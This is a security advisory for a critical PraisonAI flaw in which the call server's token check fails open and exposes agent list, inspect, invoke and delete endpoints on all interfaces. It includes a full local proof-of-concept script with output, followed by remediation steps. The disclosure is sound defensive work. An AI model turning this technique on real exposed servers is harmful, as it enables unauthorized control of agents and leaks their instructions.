PT-2026-45055 · Pypi · Praisonai

Published

2026-05-29

·

Updated

2026-05-29

·

CVE-2026-47396

CVSS v3.1

9.8

Critical

VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

PraisonAI's call server exposes a network-facing agent control API without authentication when CALL SERVER TOKEN is not configured.
The affected component is the praisonai.api.agent invoke router as mounted by praisonai.api.call. The authentication helper verify token() fails open when CALL SERVER TOKEN is unset. Since every sensitive agent-control endpoint depends on this helper, starting the call server without a token allows any reachable client to list agents, inspect agent metadata and instructions, invoke agents, and unregister agents.
This is security-relevant because the bundled call server includes the vulnerable router and binds to 0.0.0.0. As a result, operators who launch the call server without explicitly setting CALL SERVER TOKEN may unintentionally expose an unauthenticated remote agent control plane.

Details

The vulnerable behavior is caused by a fail-open authentication default.
In praisonai/api/agent invoke.py, CALL SERVER TOKEN is read from the environment:
CALL SERVER TOKEN = os.getenv('CALL SERVER TOKEN')
The authentication dependency then returns successfully when the token is not configured:
async def verify token(request: Request, authorization: Optional[str] = Header(None)) -> None:
  if not FASTAPI AVAILABLE or not CALL SERVER TOKEN:
    return # No authentication if FastAPI unavailable or no token set
This means that the absence of CALL SERVER TOKEN disables authentication entirely.
The same helper is used by sensitive agent-control routes, including:
@router.post("/agents/{agent id}/invoke")
async def invoke agent(..., : None = Depends(verify token))

@router.get("/agents")
async def list agents( : None = Depends(verify token))

@router.delete("/agents/{agent id}")
async def unregister agent endpoint(agent id: str, : None = Depends(verify token))

@router.get("/agents/{agent id}")
async def get agent info(agent id: str, : None = Depends(verify token))
These endpoints allow a caller to:
  • list registered agents;
  • retrieve agent metadata;
  • retrieve agent instruction text;
  • invoke agents;
  • unregister agents.
The vulnerable router is mounted by the call server:
from .agent invoke import router as agent invoke router
app.include router(agent invoke router)
The call server then listens on all interfaces:
uvicorn.run(app, host="0.0.0.0", port=port, log level="warning")
Therefore, when praisonai-call is started without CALL SERVER TOKEN, the agent-control API becomes reachable without authentication from any client that can access the server.

PoC

The following local PoC imports the real praisonai.api.agent invoke router from source, ensures CALL SERVER TOKEN is absent, registers a demo agent, mounts the router into a local FastAPI app, and sends unauthenticated requests to the vulnerable endpoints.
The PoC proves that, without sending any authentication material:
  1. GET /api/v1/agents returns the list of registered agents.
  2. GET /api/v1/agents/{agent id} exposes agent metadata and instructions.
  3. POST /api/v1/agents/{agent id}/invoke executes the registered agent.
  4. DELETE /api/v1/agents/{agent id} unregisters the agent.
Run with:
PRAISONAI REPO=/path/to/PraisonAI python -B embedded poc.py
Full PoC:
#!/usr/bin/env python3
from  future  import annotations

import os
import sys
from pathlib import Path
from types import SimpleNamespace


REPO ROOT = Path(os.environ.get("PRAISONAI REPO", "/path/to/PraisonAI")).resolve()
PRAISON ROOT = REPO ROOT / "src" / "praisonai"


def verify source() -> None:
  expected = {
    PRAISON ROOT / "praisonai/api/agent invoke.py": [
      "CALL SERVER TOKEN = os.getenv('CALL SERVER TOKEN')",
      "if not FASTAPI AVAILABLE or not CALL SERVER TOKEN:",
      '@router.post("/agents/{agent id}/invoke")',
      '@router.get("/agents")',
      '@router.delete("/agents/{agent id}")',
      '@router.get("/agents/{agent id}")',
    ],
    PRAISON ROOT / "praisonai/api/call.py": [
      "app.include router(agent invoke router)",
      'uvicorn.run(app, host="0.0.0.0", port=port, log level="warning")',
    ],
  }

  for path, needles in expected.items():
    if not path.exists():
      raise RuntimeError(f"source verification failed: file not found: {path}")

    text = path.read text(encoding="utf-8")
    for needle in needles:
      if needle not in text:
        raise RuntimeError(f"source verification failed: {needle!r} not found in {path}")


class DemoAgent:
  name = "demo-agent"
  instructions = "super-secret instructions"
  tools = [SimpleNamespace(name="danger-tool")]

  def start(self, message: str) -> str:
    return f"echo:{message}"


def main() -> int:
  verify source()

  os.environ.pop("CALL SERVER TOKEN", None)
  sys.path.insert(0, str(PRAISON ROOT))

  from fastapi import FastAPI
  from fastapi.testclient import TestClient
  from praisonai.api.agent invoke import CALL SERVER TOKEN, register agent, router

  app = FastAPI()
  app.include router(router)

  register agent("demo", DemoAgent())

  client = TestClient(app)

  list resp = client.get("/api/v1/agents")
  info resp = client.get("/api/v1/agents/demo")
  invoke resp = client.post("/api/v1/agents/demo/invoke", json={"message": "hello"})
  delete resp = client.delete("/api/v1/agents/demo")

  print(f"[poc] token configured={bool(CALL SERVER TOKEN)}")
  print(f"[poc] list status={list resp.status code} body={list resp.json()}")
  print(f"[poc] info status={info resp.status code} body={info resp.json()}")
  print(f"[poc] invoke status={invoke resp.status code} body={invoke resp.json()}")
  print(f"[poc] delete status={delete resp.status code} body={delete resp.json()}")

  if CALL SERVER TOKEN:
    raise SystemExit("[poc] MISS: CALL SERVER TOKEN unexpectedly set in test process")

  if list resp.status code != 200 or "demo" not in list resp.json().get("agents", []):
    raise SystemExit("[poc] MISS: unauthenticated agent listing failed")

  if info resp.status code != 200 or info resp.json().get("instructions") != "super-secret instructions":
    raise SystemExit("[poc] MISS: unauthenticated agent info leak failed")

  if invoke resp.status code != 200 or invoke resp.json().get("result") != "echo:hello":
    raise SystemExit("[poc] MISS: unauthenticated agent invocation failed")

  if delete resp.status code != 200:
    raise SystemExit("[poc] MISS: unauthenticated agent unregister failed")

  print("[poc] HIT: unauthenticated caller listed, inspected, invoked, and unregistered the demo agent")
  return 0


if  name  == " main ":
  raise SystemExit(main())
Observed result:
[poc] token configured=False
[poc] list status=200 body={'agents': ['demo'], 'count': 1, 'status': 'success'}
[poc] info status=200 body={'agent id': 'demo', 'status': 'registered', 'type': 'DemoAgent', 'name': 'demo-agent', 'instructions': 'super-secret instructions', 'tools': ['danger-tool']}
[poc] invoke status=200 body={'result': 'echo:hello', 'session id': 'default', 'status': 'success', 'metadata': {'agent id': 'demo', 'message length': 5, 'response length': 10}}
[poc] delete status=200 body={'message': "Agent 'demo' unregistered successfully", 'status': 'success'}
[poc] HIT: unauthenticated caller listed, inspected, invoked, and unregistered the demo agent
This confirms that the agent-control endpoints are accessible without authentication when CALL SERVER TOKEN is unset.

Impact

If an operator runs the PraisonAI call server without explicitly setting CALL SERVER TOKEN, any reachable client may be able to:
  • enumerate registered agents;
  • read agent metadata;
  • read agent instruction text;
  • invoke agents;
  • trigger downstream tools or external integrations connected to agents;
  • consume model or API budget through repeated invocation;
  • unregister agents and disrupt availability.
The impact depends on the deployed agents and their connected tools. For agents wired to external APIs, internal systems, local tools, or privileged actions, this creates a remote unauthenticated control surface.
The issue is not limited to information disclosure. The unauthenticated invoke endpoint can trigger agent execution, and the unauthenticated delete endpoint can remove registered agents.

Suggested remediation

Recommended fixes:
  1. Fail closed when CALL SERVER TOKEN is unset.
The authentication dependency should reject requests unless authentication is explicitly configured and a valid token is supplied.
  1. Refuse to mount the agent invocation router unless authentication is configured.
  2. If unauthenticated mode is intended for local development, bind to 127.0.0.1 by default when CALL SERVER TOKEN is absent.
  3. Add a startup error or highly visible warning when the call server is started without authentication.
  4. Add regression tests that assert 401 Unauthorized for all sensitive agent routes when no valid token is supplied.
  5. Consider requiring an explicit unsafe flag, such as --allow-unauthenticated-call-server, before allowing the server to start without authentication.

Security boundary

This report concerns the default authentication behavior of a network-facing server component. The issue is not that users can intentionally disable authentication for trusted local development. The issue is that the server fails open when CALL SERVER TOKEN is missing while the bundled server binds to 0.0.0.0, which can expose the agent-control API remotely.

Fix

Missing Authentication

Improper Access Control

Weakness Enumeration

CWE-306CWE-284

Related Identifiers

CVE-2026-47396
GHSA-86QC-R5V2-V6X6

Affected Products

Praisonai